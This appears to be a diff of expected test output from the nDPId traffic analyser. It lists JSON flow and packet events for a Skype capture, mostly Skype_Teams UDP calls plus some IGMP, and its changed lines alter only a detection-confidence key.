00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4j48AAEARa97AqAEib91NoDLdnFAAJOlwe1ECSObCw6nUMfh7bnqIU3mueprtSIlR2AyZTQ=="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661447,"flow_last_seen":1431970661447,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970661447,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431970661447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661447,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYfhAAEAGv0vAqAEiQAQXpsg1Abs0yMrkAAAAALAC\/\/8mywAAAgQFtAEDAwUBAQgKPjHu7gAAAAAEAgAA"} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1431970661649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970661649,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7yDUuR6JLNMjK5aASOJDvYAAAAgQFrAQCCApMQvL8PjHu7gEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1431970661649,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970661649,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0asRAAEAGtovAqAEiQAQXpsg1Abs0yMrlLkeiTIAQECxFxAAAAQEICj4x77VMQvL8"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgx0AAEARe8zAqAEib91KHDLdnFoALOnqe1MCA8GYjWWu9fDS5z8O1HnUzLtilbW9STWNzZ4dxAZIYogR"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3uKMAAEAR4H7AqAEinTeCkjLdgQkAI\/pPe1UCb1OUWk4YvTHMO4jKAgG4ML6WHkkTPHmm"} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xIYAAEAR1JLAqAEinTeCmDLdnFYAJvNGe1cC+NCgg6iFX83BbHq4v+mwzzHLJiFQXcBRQbw9"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":856,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.152","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1431970662914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970662914,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+nlYAAEARkRrAqAEi1cezrDLdnEsAKjxNe1kCd7pyWFY\/2XtrOx7QzlcFNoQgfV3dFZmCGAMb34HK5w=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":864,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.172","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1431970662914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970662914,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3jiIAAEAR0y7AqAEiQAQXlzLdnF0AI+cqe1sCynRK6RblWzdW13\/d3OH7SI3y+M61XQ85"} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970662914,"flow_last_seen":1431970662914,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970662914,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3FyoAAEARSg7AqAEiQAQXsDLdnEEAI4rRe10CzbovR94s4Zxf8rLQnBsqBqSn7dHSA+Hg"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.176","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6rCQAAEAR7PjAqAEinTeClDLdnFMAJgbKe18CYcW5TKiM44ghnCPOJzkfQkjh9HCzfXzFFif7"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":872,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.148","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1431970663923,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970663923,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8YPIAAEARzyHAqAEinTfrmzLdnFsAKKqoe2ECDwqATU5QUcdDsP2+OoC0sJan4F5erjlhYCY+cbA="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":873,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970663923,"flow_last_seen":1431970663923,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970663923,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1431970664361,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1431970664361,"pkt":"AQBeAAABoPPBbTu2CABGwAAgAAAAAAECgnDAqAD+4AAAAZQEAAARZO6bAAAAAA=="} -00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":878,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664361,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1431970664698,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1431970664698,"pkt":"PBXCt3IOtPCr0yf4CABGAAAg8JwAAAECkLLAqAHl4AAA+5QEAAAWAAkE4AAA+wAAAAAAAAAAAAAAAAAA"} 